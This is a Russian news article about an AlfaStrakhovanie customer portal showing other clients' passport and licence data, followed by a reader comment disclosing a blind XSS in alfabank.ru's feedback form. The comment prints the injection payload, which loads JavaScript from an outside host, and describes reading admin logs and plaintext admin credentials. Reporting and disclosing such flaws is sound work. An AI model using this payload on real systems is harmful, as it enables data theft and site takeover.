На «Хабрахабре» обвинили «АльфаСтрахование» в раскрытии персональных данных. В компании назвали это «единичным сбоем» Статьи редакции
В личном кабинете пользователя появились паспортные данные и права его однофамильцев.
Пользователь форума «Хабрахабр» MaxALebedev рассказал, что получил доступ к личным данным клиентов страховой компании «АльфаСтрахование» в личном кабинете. Вместе с информацией о себе и своих вкладах ему показали ФИО, паспортные данные и другие документы его однофамильцев.
MaxALebedev объяснил, что зашёл в личный кабинет, где вместе с его старыми полисами оказались документы других людей. Судя по скриншотам, пользователю показали паспортные данные, водительские права, информацию об автомобилях, а также данные других владельцев машины.
Пользователь замазал личные данные других клиентов «АльфаСтрахования», но отметил, что ему открылась информация только об однофамильцах. MaxALebedev попытался связаться с компанией, но не получил ответа.
К сожалению, в ответ на моё обращение по электронной почте я получил, видимо, автоматическую отписку о том, что моё обращение принято, но с 28 февраля со мной никто не связался, поэтому считаю возможным опубликовать информацию тут. Остаётся только догадываться, кому в личный кабинет привязаны мои полисы с персональными данными.
В разговоре с TJ представитель «АльфаСтрахования» Юрий Нехайчук заявил, что компания обратила внимание на проблему только после появления записи на «Хабрахабре». Она связалась с пользователем «Хабрахабра», когда устранила проблему.
Произошёл разовый сбой, с которым мы столкнулись впервые. Он оказался связан с некорректной датой рождения в одном из полисов. Из-за чего «схлопнулись» данные по двум аккаунтам в базе данных. Мы очень благодарны Максиму за то, что он выявил эту ошибку.
Представитель «АльфаСтрахования» добавил, что личные данные других клиентов не утекали, пользователям «нечего опасаться» и проблему уже решили.
На alfabank.ru в целом очень плохая безопасность. Несколько месяцев назад обнаружил у них на главной странице в обратной связи Blind XSS. Суть вот в чём - я присылаю им </script><script src=https://site.com/a.js?>; в имени пользователя и у них в админ панели выполняется этот js код. Можно просматривать в логах сообщения пользователей и их email адреса, а так же получить доступ к управлению целым сайтом! Для того, чтобы получить доступ к админке, не обязательно воровать куки, можно просто в логах посмотреть логин и пароль админа в открытом виде.
Пруф(небольшой кусок исходного кода в логах) https://pastebin.com/kxttDwTE . Это всего лишь малая часть всех пользователей, всего за один заход можно прочитать 400 сообщений и украсть 400 email адресов.
Я не уважаю администрацию alfabank, но с уважением отношусь к их пользователям, поэтому я скрыл фамилии, email адреса юзеров, а также айпи, логин и пароль админа. В данный момент админка не доступна https://alfabank.ru/admin/user_feedback/ .
После обнаружения уязвимости отписал им в обратной связи, сам в логах увидел, что они прочитали моё сообщение(они перешли в переписку со мной и выполнили мой js) и намеренно игнорируют. Подождал немного, вдруг захотят ответить или хотя бы устранить критическую уязвимость, но никто всё равно не ответил. В итоге раскрыл публично эту уязвимость на своём twitter и их упомянул. Через полчаса написали, что баг устранили, даже спасибо не сказали.
Типичный российский быдло-бизнес, который не умеет в самокритику.
Программа вознаграждения за найденные дыры? Нет, не слышали
...и вообще расходимся, тут не на что смотреть.